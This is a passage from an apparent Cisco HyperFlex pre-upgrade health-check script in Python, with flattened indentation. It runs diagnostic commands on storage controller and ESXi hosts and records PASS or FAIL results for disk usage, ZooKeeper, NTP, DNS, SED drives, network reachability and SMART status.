for line in op:
if "Not able to run the command" in line or "No such file or directory" in line:
cuflag = 1
if cuflag:
curepoch = ""
else:
curepoch = "".join(op)
# 6) Disk usage
# Each should be less than 80%
cmd = "df -h | grep -i '/var/stv\|/var/zookeeper\|/sda1'"
diskop = execmd(cmd)
zdiskchk = "PASS"
zdisk = ""
for line in diskop:
if "Not able to run the command" in line:
zdiskchk = "NA"
break
elif "/sda1" in line:
m1 = re.search(r"(\d+)%", line)
if m1:
if int(m1.group(1)) > 80:
zdiskchk = "FAIL"
zdisk = "/sda1"
break
elif "/var/stv" in line:
m2 = re.search(r"(\d+)%", line)
if m2:
if int(m2.group(1)) > 80:
zdiskchk = "FAIL"
zdisk = "/var/stv"
break
elif "/var/zookeeper" in line:
m3 = re.search(r"(\d+)%", line)
if m3:
if int(m3.group(1)) > 80:
zdiskchk = "FAIL"
zdisk = "/var/zookeeper"
break
# Update Test Detail info
testdetail[ip]["ZooKeeper and Exhibitor check"] = OrderedDict()
# Mode
testdetail[ip]["ZooKeeper and Exhibitor check"]["Mode"] = mode
# Current ensemble size
testdetail[ip]["ZooKeeper and Exhibitor check"]["Current ensemble size"] = nodes
# Services
testdetail[ip]["ZooKeeper and Exhibitor check"]["Services"] = exh_service
# exhibitor.properties file
testdetail[ip]["ZooKeeper and Exhibitor check"]["exhibitor.properties file"] = prop_file
# Accepted Epoch value
testdetail[ip]["ZooKeeper and Exhibitor check"]["Accepted Epoch value"] = accepoch
# Current Epoch value
testdetail[ip]["ZooKeeper and Exhibitor check"]["Current Epoch value"] = curepoch
# Disk Usage
testdetail[ip]["ZooKeeper and Exhibitor check"]["System Disks Usage"] = {"Status": zdiskchk, "Result": zdisk}
# Update Test summary
zoo_chk = "FAIL"
exh_chk = "FAIL"
if mode == "follower" or mode == "leader" or mode == "standalone":
zoo_chk = "PASS"
if "running" in exh_service.lower():
exh_chk = "PASS"
testsum[ip]["Zookeeper check"] = {"Status": zoo_chk, "Result": "Checks if Zookeeper service is running."}
testsum[ip]["Exhibitor check"] = {"Status": exh_chk, "Result": "Checks if Exhibitor in running."}
testsum[ip]["System Disks Usage"] = {"Status": zdiskchk, "Result": "Checks if /sda1, var/stv and /var/zookeeper is less than 80%."}
def hdd_check(ip):
# HDD health check
# sysmtool --ns disk --cmd list
# sysmtool --ns disk --cmd list | grep -i claimed | wc -l
# Claimed Disks
cmd = "sysmtool --ns disk --cmd list | grep -i claimed | wc -l"
op = execmd(cmd)
cdsk = ""
for line in op:
cdsk = line.strip()
# sysmtool --ns disk --cmd list | grep -i blacklisted | wc -l
# Blacklisted Disks
cmd = "sysmtool --ns disk --cmd list | grep -i blacklisted | wc -l"
op = execmd(cmd)
bdsk = ""
bdisklist = []
for line in op:
bdsk = line.strip()
if bdsk != "":
cmd = "sysmtool --ns disk --cmd list"
opl = execmd(cmd)
flg1 = flg2 = 0
for line in opl:
if "UUID:" in line:
flg1 = 1
flg2 = 0
continue
if flg1 == 1 and "State:" in line and "BLACKLISTED" in line:
flg2 = 1
flg1 = 0
continue
if flg2 == 1 and "Path:" in line:
ln = line.split(": ")
if len(ln) == 2:
bdisklist.append(ln[1])
logger.info("Blacklisted Disks: " + ",".join(bdisklist) + "\r")
# sysmtool --ns disk --cmd list | grep -i ignored | wc -l
# Ignored Disks
cmd = "sysmtool --ns disk --cmd list | grep -i ignored | wc -l"
op = execmd(cmd)
idsk = ""
for line in op:
idsk = line.strip()
# Update Test Detail info
testdetail[ip]["HDD Health check"] = OrderedDict()
# Claimed
testdetail[ip]["HDD Health check"]["Claimed"] = cdsk
#Blacklisted
testdetail[ip]["HDD Health check"]["Blacklisted"] = {"Status": bdsk, "Result": "\n".join(bdisklist)}
# Ignored
testdetail[ip]["HDD Health check"]["Ignored"] = idsk
# Update Test summary
hd_chk = "PASS"
if int(bdsk) > 0:
hd_chk = "FAIL"
testsum[ip]["HDD Health check"] = {"Status": hd_chk, "Result": "Checks if any drive is in blacklisted state."}
def pre_upgrade_check(ip):
# Pre-Upgrade Check
# 1) Check HX Cluster version
cmd = "stcli cluster version"
hxvs = execmd(cmd)
vflag = False
global sedflag
for line in hxvs:
if "Cluster version" in line:
l = line.split(": ")
if len(l) == 2:
version = l[1]
#Cluster version: Version(4.0.2a-35118)
if "Version" in version:
m = re.search(r"\((.+)\)", version)
if m:
hostd[ip]["version"] = m.group(1)
else:
hostd[ip]["version"] = version.strip()
if l[1].startswith("1.8"):
vflag = True
# 2) NTP deamon running check
ntp_deamon_check = "FAIL"
cmd = "ps aux | grep ntp"
ntp_deamon = ""
op = execmd(cmd)
for line in op:
match = re.search(r"^ntp \s+\d+", line)
if match:
ntp_deamon = match.group()
ntp_deamon_check = "PASS"
msg = "\r\nNTP deamon running check: " + str(ntp_deamon) + "\r"
log_msg(INFO, msg)
# 3) NTP Sync Check
cmd = "ntpq -p -4 | grep '^*'"
ntpsl = execmd(cmd)
ntp_sync_check = "FAIL"
ntp_sync_line = ""
flag1 = 0
for line in ntpsl:
if "Not able to run the command" in line:
ntp_sync_check = "FAIL"
elif line.startswith("*"):
l = line.split()
ntp_sync_line = l[0]
ntp_sync_check = "PASS"
break
# 4) DNS check
cmd = "stcli services dns show"
op = execmd(cmd)
dnsip = ""
dns_check = "FAIL"
digop = []
for line in op:
match = re.search(r"(?:\d{1,3}.){3}\d{1,3}", line)
if match:
dnsip = match.group()
msg = "\r\nDNS IP Address: " + str(dnsip) + "\r"
log_msg(INFO, msg)
if dnsip:
cmd = "dig @{}".format(dnsip)
dns_check = "FAIL"
digop = execmd(cmd)
for line in digop:
if "HEADER" in line and "status: NOERROR" in line:
dns_check = "PASS"
break
elif "OPT PSEUDOSECTION:" in line:
break
digop = [(str(l).rstrip()).replace("\t", " "*5) for l in digop]
# Update Test summary
if dns_check == "PASS":
testsum[ip]["DNS check"] = {"Status": "PASS", "Result": "Checks if configured DNS is reachable."}
else:
testsum[ip]["DNS check"] = {"Status": "FAIL", "Result": "Please verify DNS resolution and connectivity."}
# 5) vCenter Reachability check
cmd = "stcli cluster info | grep vCenterURL"
op = execmd(cmd)
vcenterip = ""
vcenter_check = "FAIL"
for line in op:
match = re.search(r"(?:\d{1,3}.){3}\d{1,3}", line)
if match:
vcenterip = match.group()
msg = "\r\nvCenter IP Address: " + str(vcenterip) + "\r"
log_msg(INFO, msg)
else:
try:
l = line.split(": ")
if len(l) == 2:
dnip = l[1]
dnip = dnip.replace("https://", "")
vcenterip = dnip.strip()
msg = "\r\nvCenter IP Address: " + str(vcenterip) + "\r"
log_msg(INFO, msg)
except Exception:
pass
if vcenterip:
cmd = "ping {} -c 3 -i 0.01".format(vcenterip)
op = execmd(cmd)
vcenter_check = pingstatus(op)
# Update Test summary
# vCenter Reachability check
if vcenter_check == "FAIL":
testsum[ip]["vCenter reachability check"] = {"Status": vcenter_check, "Result": "Check manually network connectivity."}
else:
testsum[ip]["vCenter reachability check"] = {"Status": vcenter_check, "Result": "Checks if vCenter is network reachable using PING."}
# Timestamp check
testsum[ip]["Timestamp check"] = {"Status": str(hostd[ip]["date check"]), "Result": "Checks if the timestamp is same across all Nodes."}
# ntp source check
if ntp_deamon_check == "PASS" and hostd[ip]["ntp source check"] == "PASS" and ntp_sync_check == "PASS":
testsum[ip]["NTP sync check"] = {"Status": "PASS", "Result": "Checks if the NTP is synced with NTP server."}
else:
testsum[ip]["NTP sync check"] = {"Status": "FAIL", "Result": "Checks if the NTP is synced with NTP server."}
# Check package & versions
testsum[ip]["Check package & versions"] = {"Status": str(hostd[ip]["check package & versions"]), "Result": "Checks for count and version of HX packages on each node."}
# Check Iptables count
testsum[ip]["Check Iptables count"] = {"Status": str(hostd[ip]["check iptables"]), "Result": "Checks if the IP Table count matches on all nodes."}
# 6) Check cluster usage
cmd = "stcli cluster storage-summary | grep -i nodeFailuresTolerable"
op = execmd(cmd)
op = "".join(op)
op = op.strip()
if ":" in op:
NFT = op.split(":")[1]
else:
NFT = "NA"
cmd = "stcli cluster storage-summary | grep -i cachingDeviceFailuresTolerable"
op = execmd(cmd)
op = "".join(op)
op = op.strip()
if ":" in op:
HFT = op.split(":")[1]
else:
HFT = "NA"
cmd = "stcli cluster storage-summary | grep -i persistentDeviceFailuresTolerable"
op = execmd(cmd)
op = "".join(op)
op = op.strip()
if ":" in op:
SFT = op.split(":")[1]
else:
SFT = "NA"
# 7) Check cache is spread across all controller
cmd = "nfstool -- -m | sort -u -k2"
cachl = []
op = execmd(cmd)
for line in op:
m = re.search(r"^\d+\s+([\d]{1,3}(.[\d]{1,3}){3})", line)
if m:
cachl.append(str(m.group(1)))
# 8) Check any extra number of pnodes
cmd = "stcli cluster info | grep -i pnode -n2 | grep -i name | wc -l"
op = execmd(cmd)
op = "".join(op)
pnodes = int(op)
check_cache_vnodes = ""
if cachl:
if pnodes == len(cachl):
check_cache_vnodes = "PASS"
else:
check_cache_vnodes = "FAIL"
snodes = len(eth1_list)
nodecheck = "FAIL"
if pnodes == snodes:
nodecheck = "PASS"
testsum[ip]["Extra pnodes check"] = {"Status": nodecheck, "Result": "Checks for any stale Node entry."}
# 9) check packages and versions(Moved to Thread)
# 10) check memory
cmd = "free -m | grep Mem:"
op = execmd(cmd)
check_memory = "NA"
if op:
for line in op:
l = line.split()
frmem = int(l[-1])
if int(frmem) >= 2048:
check_memory = "PASS"
else:
check_memory = "FAIL"
if check_memory == "FAIL":
testsum[ip]["Memory usage check"] = {"Status": "FAIL", "Result": "Contact TAC"}
else:
testsum[ip]["Memory usage check"] = {"Status": check_memory, "Result": "Checks for available memory more than 2GB."}
# 11) check CPU
cmd = "top -b -n 1 | grep -B7 KiB"
check_cpu = execmd(cmd)
if not check_cpu:
cmd = "top -b -n 1 | grep Cpu"
check_cpu = execmd(cmd)
# 12) check Out of memory
cmd = "grep -ia 'out of memory' /var/log/kern.log"
op = execmd(cmd)
if op:
if "Not able to run the command" in op:
check_oom = ["No issue"]
testsum[ip]["Incidence of OOM in the log file"] = {"Status": "PASS",
"Result": "Checks for any previous incidence of Out Of Memory Condition."}
else:
check_oom = op
testsum[ip]["Incidence of OOM in the log file"] = {"Status": "FAIL",
"Result": "Checks for any previous incidence of Out Of Memory Condition."}
else:
check_oom = ["No issue"]
testsum[ip]["Incidence of OOM in the log file"] = {"Status": "PASS",
"Result": "Checks for any previous incidence of Out Of Memory Condition."}
# 13) ESXi supported upgrade
cmd = "grep -i ^esxi.version /usr/share/springpath/storfs-fw/springpath-hcl.conf"
op = execmd(cmd)
svsp = []
if op:
for line in op:
if "esxi.version=" in line:
l = line.split("=")
if len(l) == 2:
vl = l[1]
svsp = vl.split(",")
testsum[ip]["Supported vSphere versions"] = {"Status": str("\n".join(svsp)), "Result": "Prints the supported ESXi versions."}
# 14) Check permissions for /tmp
cmd = "ls -ld /tmp"
op = execmd(cmd)
tmprcheck = ""
for line in op:
if line.startswith("drwxr-xrwx") or line.startswith("drwxrwxrwx"):
tmprcheck = "PASS"
else:
tmprcheck = "FAIL"
testsum[ip]["Check permissions for /tmp"] = {"Status": tmprcheck, "Result": "Checks if the /tmp permissions are set correctly."}
# 15) Cluster Policy (Lenient/Strict) check
cmd = "stcli cluster info | grep -i 'clusterAccessPolicy:' | head -1"
op = execmd(cmd)
clPolicy = ""
for line in op:
if "lenient" in line.lower():
clPolicy = "Lenient"
testsum[ip]["Check Cluster Policy"] = {"Status": "Lenient", "Result": "Checks the Configured Cluster Policy"}
elif "strict" in line.lower():
clPolicy = "Strict"
testsum[ip]["Check Cluster Policy"] = {"Status": "Strict", "Result": "Please refer - https://tinyurl.com/yadvhd84"}
# 16) Upgrade suggestion for HX version 2.1(1x)
hxv = ""
hxupsug = ""
try:
hxv = hostd[ip]["version"]
m = re.search(r"2\.1[\.|(]1.", hxv)
if m:
hxupsug = "DO NOT direct upgrade to 3.5.2g.\nUpgrade to 3.5.2f first."
except Exception:
pass
# 17) Different sector size check for HX version equal to 3.5.2a or < 3.0.1j
hxsectchk = ""
if "3.5.2a" in hxv:
hxsectchk = "Do not perform node expansion or add drives (with HX-SD38TBE1NK9) before \nupgrading to higher versions"
elif hxv.startswith("1.") or hxv.startswith("2."):
hxsectchk = "Do not perform node expansion or add drives (with HX-SD38TBE1NK9) before \nupgrading to higher versions"
else:
m = re.search(r"3\.0\.1[a-j]", hxv)
if m:
hxsectchk = "Do not perform node expansion or add drives (with HX-SD38TBE1NK9) before \nupgrading to higher versions"
# 18) Check springpath_keystore.jceks file [Run in Thread]
keystoreCheck = str(hostd[ip]["check keystore"])
if keystoreCheck == "FAIL":
testsum[ip]["Check springpath_keystore.jceks file"] = {"Status": "FAIL", "Result": "If failed, contact Cisco TAC."}
else:
testsum[ip]["Check springpath_keystore.jceks file"] = {"Status": keystoreCheck, "Result": "All the SCVM have same keystore file."}
# 19) SED Capable Check
global lsusbCheck
sedCapable = False
usbCheck = False
sedEnable = False
sedDrive = False
diskLock = ""
cmd = "cat /etc/springpath/sed_capability.conf"
op = execmd(cmd)
for line in op:
if "True" in line:
sedCapable = True
if sedCapable:
testsum[ip]["SED Capable"] = {"Status": "YES", "Result": "Checks if the cluster is SED Capable."}
else:
testsum[ip]["SED Capable"] = {"Status": "NO", "Result": "Checks if the cluster is SED Capable."}
if sedCapable:
# 20) USB0 Check:
cmd = "ifconfig | grep -i usb0 -A1 | grep 'inet addr' | cut -d ':' -f2 | cut -d ' ' -f1"
op = execmd(cmd)
if op:
usbCheck = True
testsum[ip]["USB0 check"] = {"Status": "PASS", "Result": "Checks for USB0 in SED clusters."}
else:
lsusbCheck = True
testsum[ip]["USB0 check"] = {"Status": "FAIL", "Result": "Contact TAC"}
# 21) SED AF Drives – 5100/5200 Check
# Condition1 : Running 3.5(2a) and below
# Condition2: Micron_5100 or Micron_5200 in /var/log/springpath/diskslotmap-v2.txt
sflag1 = sflag2 = 0
if "3.5.2a" in hxv:
sflag1 = 1
elif hxv.startswith("1.") or hxv.startswith("2."):
sflag1 = 1
elif hxv.startswith("3.5"):
m1 = re.search(r"[1-3]\.[0-5]\.1[a-z]", hxv)
if m1:
sflag1 = 1
else:
m2 = re.search(r"3\.[0-4]", hxv)
if m2:
sflag1 = 1
# Condition2: Micron_5100 or Micron_5200 in /var/log/springpath/diskslotmap-v2.txt
cmd = "grep -E -- 'Micron_5100|Micron_5200' /var/log/springpath/diskslotmap-v2.txt"
op = execmd(cmd)
for line in op:
if "Micron_5100" in line or "Micron_5200" in line:
sflag2 = 1
if sflag1 and sflag2:
global sedNote
sedNote = True
testsum[ip]["SED AF Drives – 5100/5200 check"] = {"Status": "FAIL", "Result": "Please refer - https://tinyurl.com/vqnytww"}
elif not sflag1 and sflag2:
sedDrive = True
testsum[ip]["SED AF Drives – 5100/5200 check"] = {"Status": "PASS", "Result": "Checks if Micron 5100/5200 drives in use."}
# 22) SED Enabled Check:
cmd = "cat /etc/springpath/sed.conf"
op = execmd(cmd)
for line in op:
if "sed_encryption_state=enabled" in line:
sedEnable = True
testsum[ip]["SED Enabled"] = {"Status": "YES", "Result": "Checks if the cluster is SED Enabled."}
else:
testsum[ip]["SED Enabled"] = {"Status": "NO", "Result": "Checks if the cluster is SED Enabled."}
# 23) Disk Locked Check:
if sedEnable:
cmd = "/usr/share/springpath/storfs-appliance/sed-client.sh -l | cut -d ',' -f5 | grep -a 1"
op = execmd(cmd)
if op:
diskLock = "PASS"
testsum[ip]["Disk Locked check"] = {"Status": "PASS", "Result": "Checks if any SED disk is locked."}
else:
diskLock = "FAIL"
testsum[ip]["Disk Locked check"] = {"Status": "FAIL", "Result": "Checks if any SED disk is locked."}
# Stretch Cluster check
global stretchCluster
witnessVmIp = ""
witnessReachability = ""
witnessLatetency = ""
storageLatetency = ""
if stretchCluster:
# Get the Witness VM IP
cmd = "stcli cluster info | grep dataZkIp"
op = execmd(cmd)
for line in op:
m = re.search(r"([\d]{1,3}(.[\d]{1,3}){3})", line)
if m:
witnessVmIp = str(m.group(1))
log_msg(INFO, "Witness VM IP Address: " + str(witnessVmIp) + "\r")
# 24) Check Witness Reachability
# Ping from eth0 to Witness VM IP Address
if witnessVmIp:
hostd[ip]["witnessVmIp"] = witnessVmIp
eth0 = hostd[ip]["eth0"]
cmd = "ping -I {} {} -c 3 -i 0.5".format(eth0, witnessVmIp)
wop = execmd(cmd)
witnessReachability = pingstatus(wop)
testsum[ip]["Check Witness Reachability"] = {"Status": witnessReachability, "Result": "Checks Witness VM IP address is reachabile."}
# 25) Check Witness Latetency
# Ping Time should be less than 200ms
for line in wop:
if "round-trip" in line:
m = re.search(r"\/(\d+\.\d+)\sms$", line.strip())
if m:
pingTime = str(m.group(1))
try:
if float(pingTime) < 200:
witnessLatetency = "PASS"
else:
witnessLatetency = "FAIL"
# 26) Check Storage Latetency
# Ping Time should be less than 5ms
if float(pingTime) < 5:
storageLatetency = "PASS"
else:
storageLatetency = "FAIL"
testsum[ip]["Check Witness Latetency"] = {"Status": witnessLatetency,
"Result": "Checks Witness VM IP address is latetency."}
testsum[ip]["Check Storage Latetency"] = {"Status": storageLatetency,
"Result": "Checks Storage latetency."}
except Exception:
pass
# 26) Check ZK-Cleanup-Script
# Only for HX 4.0.2c
zkstatus = ""
try:
if "4.0.2c" in hostd[ip]["version"]:
cmd = "ps -aux | grep ZKTx | wc -l"
op = execmd(cmd)
if op:
zkcnt = op[0]
if zkcnt.isdigit():
if int(zkcnt) == 0:
zkstatus = "FAIL"
else:
zkstatus = "PASS"
if zkstatus == "FAIL":
testsum[ip]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "http://cs.co/9008HGXsy"}
else:
testsum[ip]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "Check to Identify multiple ZKTxnCleanup script."}
except Exception:
pass
# 27) Run lsusb when USB0 Check Fails
if lsusbCheck:
cmd = "lsusb"
op = execmd(cmd)
# 28) Check Disk for SMART Failure
cmd = """for D in $(/bin/lsblk -dpn -e 1,2,7,11 | awk '{ print $1 }'); do
echo $D | grep -q nvme
if [ $? -eq 0 ];
then
STATUS=$(/usr/sbin/nvme smart-log $D 2> /dev/null |
awk -F': ' '/critical_warning/ { print $NF }')
else
/usr/sbin/smartctl -q silent -H -i $D;
STATUS=$?
STATUS=$((STATUS & 26))
fi
echo "$D: $STATUS";
done"""
diskList = execmd(cmd)
smartFailDiskList = []
for disk in diskList:
if "0" not in disk:
smartFailDiskList.append(disk)
if smartFailDiskList:
testsum[ip]["Check Disk for SMART Failure"] = {"Status": "FAIL", "Result": "Contact TAC"}
else:
testsum[ip]["Check Disk for SMART Failure"] = {"Status": "PASS", "Result": "Checking Disk for SMART Failure"}
# Check hxuser password
testsum[ip]["Check hxuser password characters"] = {"Status": str(hostd[ip]["check hxuser password"]), "Result": "Checking hxuser password characters"}
#####################################################
# Update Test Detail info
testdetail[ip]["Pre-Upgrade check"] = OrderedDict()
# HX Cluster version
testdetail[ip]["Pre-Upgrade check"]["HX Cluster version"] = hxvs
# NTP deamon running
testdetail[ip]["Pre-Upgrade check"]["NTP deamon running"] = {"Status": ntp_deamon, "Result": ntp_deamon_check}
# NTP sync check
testdetail[ip]["Pre-Upgrade check"]["NTP sync check"] = {"Status": ntp_sync_line, "Result": ntp_sync_check}
# DNS check
testdetail[ip]["Pre-Upgrade check"]["DNS check"] = {"Status": str("\n".join(digop)), "Result": dns_check}
# vCenter reachability check
testdetail[ip]["Pre-Upgrade check"]["vCenter reachability check"] = {"Status": vcenterip, "Result": vcenter_check}
# Timestamp check
allhostdt = []
for i in sorted(hostd.keys()):
allhostdt.append(str(i) + " - " + str(hostd[i]["date"]))
testdetail[ip]["Pre-Upgrade check"]["Timestamp check"] = {"Status": str("\n".join(allhostdt)), "Result": str(hostd[ip]["date check"])}
# Primary NTP Source check
allntpsrc = []
for p in sorted(hostd.keys()):
allntpsrc.append(str(p) + " : NTP IP - " + str(hostd[p]["ntp source"]))
testdetail[ip]["Pre-Upgrade check"]["Primary NTP Source check"] = {"Status": str("\n".join(allntpsrc)), "Result": str(hostd[ip]["ntp source check"])}
# Cluster usage
testdetail[ip]["Pre-Upgrade check"]["Cluster Fault Tolerance"] = "Node Failures Tolerable:" + str(NFT) + "\nHDD Failures Tolerable:" + str(HFT) + "\nSSD Failures Tolerable:" + str(SFT)
# Cache usage
testdetail[ip]["Pre-Upgrade check"]["Cache vNodes"] = {"Status": str("\n".join(cachl)), "Result": check_cache_vnodes}
# Cluster Upgrade Status: Removed
# No extra pnodes
testdetail[ip]["Pre-Upgrade check"]["No extra pnodes"] = nodecheck
# Check package & versions
testdetail[ip]["Pre-Upgrade check"]["Check package & versions"] = {"Status": str("\n".join(hostd[ip]["package & versions"])), "Result": str(hostd[ip]["check package & versions"])}
# Check Iptables count
testdetail[ip]["Pre-Upgrade check"]["Check Iptables count"] = {"Status": str(hostd[ip]["iptables count"]), "Result": str(hostd[ip]["check iptables"])}
# Check memory
testdetail[ip]["Pre-Upgrade check"]["Check Memory usage"] = str(check_memory)
# Check CPU
testdetail[ip]["Pre-Upgrade check"]["Check CPU"] = str("\n".join(check_cpu))
# Check Out of memory
testdetail[ip]["Pre-Upgrade check"]["Incidence of OOM in the log file"] = str("\n".join(check_oom))
# Supported vSphere versions
testdetail[ip]["Pre-Upgrade check"]["Supported vSphere versions"] = str("\n".join(svsp))
# Check permissions for /tmp
testdetail[ip]["Pre-Upgrade check"]["Check permissions for /tmp"] = tmprcheck
if hxupsug != "":
testdetail[ip]["Pre-Upgrade check"]["Upgrade suggestion for HX version 2.1(1x)"] = hxupsug
if hxsectchk != "":
testdetail[ip]["Pre-Upgrade check"]["Different sector size check"] = hxsectchk
# Cluster Policy (Lenient/Strict) check
if clPolicy == "Strict":
testdetail[ip]["Pre-Upgrade check"]["Cluster Policy check"] = {"Status": "Strict", "Result": "Please refer - https://tinyurl.com/yadvhd84"}
else:
testdetail[ip]["Pre-Upgrade check"]["Cluster Policy check"] = clPolicy
# Check springpath_keystore.jceks file
testdetail[ip]["Pre-Upgrade check"]["Check springpath_keystore.jceks file"] = str(hostd[ip]["check keystore"])
# SED Capable Check:
if sedCapable:
testdetail[ip]["Pre-Upgrade check"]["SED Capable"] = "YES"
if usbCheck:
testdetail[ip]["Pre-Upgrade check"]["USB0 check"] = "PASS"
else:
testdetail[ip]["Pre-Upgrade check"]["USB0 check"] = {"Status": "FAIL", "Result": "Contact TAC"}
else:
testdetail[ip]["Pre-Upgrade check"]["SED Capable"] = "NO"
# SED AF Drives – 5100/5200 Check
if sedNote:
testdetail[ip]["Pre-Upgrade check"]["SED AF Drives – 5100/5200 check"] = {"Status": "FAIL", "Result": "Please refer - https://tinyurl.com/vqnytww"}
if sedDrive:
testdetail[ip]["Pre-Upgrade check"]["SED AF Drives – 5100/5200 check"] = "PASS"
# SED Enabled Check:
if sedEnable:
testdetail[ip]["Pre-Upgrade check"]["SED Enabled"] = "YES"
testdetail[ip]["Pre-Upgrade check"]["Disk Locked check"] = diskLock
# Stretch Cluster Check
if witnessVmIp:
testdetail[ip]["Pre-Upgrade check"]["Check Witness Reachability"] = {"Status": witnessReachability, "Result": "Checks Witness VM IP address is reachabile."}
testdetail[ip]["Pre-Upgrade check"]["Check Witness Latetency"] = {"Status": witnessLatetency, "Result": "Checks Witness VM IP address is latetency."}
testdetail[ip]["Pre-Upgrade check"]["Check Storage Latetency"] = {"Status": storageLatetency, "Result": "Checks Storage latetency."}
# Check ZK-Cleanup-Script
if zkstatus:
if zkstatus == "FAIL":
testdetail[ip]["Pre-Upgrade check"]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "http://cs.co/9008HGXsy"}
else:
testdetail[ip]["Pre-Upgrade check"]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "Check to Identify multiple ZKTxnCleanup script."}
# Check Disk for SMART Failure
if smartFailDiskList:
testdetail[ip]["Pre-Upgrade check"]["Check Disk for SMART Failure"] = {"Status": "FAIL", "Result": "\n".join(smartFailDiskList)}
else:
testdetail[ip]["Pre-Upgrade check"]["Check Disk for SMART Failure"] = "PASS"
# Check hxuser password
testdetail[ip]["Pre-Upgrade check"]["Check hxuser password characters"] = str(hostd[ip]["check hxuser password"])
def network_check(ip):
# Network Check(ESX)
try:
# Close connection
client.close()
except Exception:
pass
esxip = hostd[ip]["esxip"]
esx_version = ""
try:
if esxip != "":
# Initiate SSH Connection
client.connect(hostname=esxip, username=hxusername, password=esxpassword, timeout=time_out)
msg = "\r\nSSH connection established to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
# Get all ESX and Storage Controller IP Address
opd = OrderedDict()
nwtestsum[esxip] = OrderedDict()
nwtestdetail[esxip] = OrderedDict()
# 1) Check hx user created
hxac = ""
try:
cmd = "esxcli system account list"
op = execmd(cmd)
hxac = "FAIL"
for line in op:
if "hxuser" in line or "springpath" in line:
hxac = "PASS"
opd.update({"HX User Account Created": hxac})
except Exception:
pass
# 2) Check vMotion Enabled
vmst = esx_vmotion[esxip]["vmotion"]
opd.update({"vMotion Enabled": vmst})
# 3) Check vMotion reachability check
allvmkpingchk = []
vmknode = esx_vmotion[esxip].get("vmknode", "")
if vmst == "PASS" and vmknode != "":
for vip in esx_vmotion.keys():
mtu = esx_vmotion[str(vip)]["mtu"]
vmkip = esx_vmotion[str(vip)]["vmkip"]
if vip == esxip:
continue
elif vmkip != "":
try:
cmd = "vmkping -I {} -c 3 -d -s {} -i 0.5 {}".format(vmknode, mtu, vmkip)
op = execmd(cmd)
pst = pingstatus(op)
opd.update({cmd: pst})
allvmkpingchk.append(pst)
except Exception:
pass
# 4) Check ESXi Version
try:
cmd = "vmware -l"
op = execmd(cmd)
opd.update({"ESX Version": op})
v = op[0]
m = re.search(r"ESXi (\d\.\d)", v)
if m:
esx_version = m.group(1)
except Exception:
pass
# 5) ESX vib list
vibl = []
try:
#cmd = "esxcli software vib list| grep -i spring"
cmd = "esxcli software vib list| egrep -i 'scvm|stHyper|stfs'"
op = execmd(cmd)
for line in op:
vibl.append(line.replace(" "*26, " "))
opd.update({"ESX Vib List": vibl})
except Exception:
pass
# 6) Check SCVM and STFSNasPlugin version: Removed
# 7) ESX Services
try:
cmd = "chkconfig --list | grep -E 'ntpd|hostd|vpxa|stHypervisorSvc|scvmclient|hxctlvm'"
op = execmd(cmd)
opd.update({"ESX Services": op})
except Exception:
pass
# 8) Check for HX down during upgrade
check_HX_down_status = ""
try:
if esx_version and float(esx_version) >= 6.7:
# ESXi 6.7 and above
cmd = "netdbg vswitch runtime get | grep TeamPolicyUpDelay -A2 | cut -d ':' -f2"
op = execmd(cmd)
if op:
v = op[0]
v = v.strip()
if v.isdigit():
if int(v) < 30000:
check_HX_down_status = "FAIL"
else:
check_HX_down_status = "PASS"
else:
# ESXi 6.5 and lower
cmd = "esxcli system settings advanced list | grep TeamPolicyUpDelay -A2 | grep Int | cut -d ':' -f2 | cut -d ' ' -f2"
op = execmd(cmd)
if op:
v = op[0]
v = v.strip()
if v.isdigit():
if int(v) < 30000:
check_HX_down_status = "FAIL"
else:
check_HX_down_status = "PASS"
opd["Check for ESXI Failback timer"] = check_HX_down_status
except Exception:
pass
# 9) vmk1 ping to each SCVM eth1
vmk1 = ""
mtu = "1472"
try:
vmk1 = hostd[ip]["vmk1"]
mtu = vmk1_mtu[vmk1]["mtu"]
except Exception:
if esxip in compute_vmk0_list:
vmk1 = esxip
# Get MTU
try:
cmd = "esxcfg-vmknic -l"
op = execmd(cmd)
for line in op:
if vmk1 in line and "IPv4" in line:
if " 1500 " in line:
mtu = "1472"
elif " 9000 " in line:
mtu = "8972"
except Exception as e:
log_msg(ERROR, str(e) + "\r")
vmkpingchk = []
if len(eth1_list) > 0 and vmk1:
for k in eth1_list:
try:
cmd = "vmkping -I {} -c 3 -d -s {} -i 0.5 {}".format("vmk1", mtu, k)
op = execmd(cmd)
pst = pingstatus(op)
opd.update({cmd: pst})
vmkpingchk.append(pst)
except Exception:
pass
# 10) vSwitch info of ESXi
try:
cmd = "esxcfg-vswitch -l"
op = execmd(cmd)
cm = "esxcfg-vswitch -l"
opd.update({cm: op})
except Exception:
pass
# 11) Check extra contoller vm folders
vmfld = ""
try:
cmd = "esxcli hardware platform get | grep -i serial"
op = execmd(cmd)
srno = ""
for line in op:
if line.startswith("Serial Number"):
l = line.split(": ")
try:
srno = l[1]
srno = srno.strip()
except Exception:
pass
break
if srno != "":
cmd = "ls /vmfs/volumes/SpringpathDS-" + str(srno.strip())
op = execmd(cmd)
op = [x for x in op if x != ""]
vmfld = "PASS"
#print(len(op))
fcnt = 0
if op:
for line in op:
l = line.split()
for d in l:
if d.startswith("stCtlVM"):
fcnt += 1
if fcnt > 1:
vmfld = "FAIL" + "\nBug: HX Down"
opd.update({"No extra controller vm folders": vmfld})
except Exception:
pass
# 12) VMware Tools location check:
vmtoolcheck = ""
try:
cmd = "esxcli system settings advanced list -o /UserVars/ProductLockerLocation | grep -i 'string value'"
op = execmd(cmd)
svalue = ""
dsvalue = ""
for line in op:
if line.startswith("String Value"):
svalue = line.split(": ")[1]
elif line.startswith("Default String Value"):
dsvalue = line.split(": ")[1]
if svalue != "" and dsvalue != "":
if svalue == dsvalue:
vmtoolcheck = "PASS"
else:
vmtoolcheck = "FAIL"
opd.update({"VMware Tools location check": vmtoolcheck})
except Exception:
pass
# 13) vfat Disk Usage check
vfatcheck = "PASS"
try:
cmd = "df -h | grep vfat | grep 100%"
op = execmd(cmd)
for line in op:
if "100%" in line:
vfatcheck = "FAIL"
break
opd.update({"vfat Disk Usage check": vfatcheck})
except Exception:
pass
# 14) Check /tmp usage
tmpUsageCheck = ""
try:
cmd = "vdf | grep tmp"
op = execmd(cmd)
for line in op:
if "tmp" in line:
m = re.search(r"\s(\d+)%\s", line)
if m:
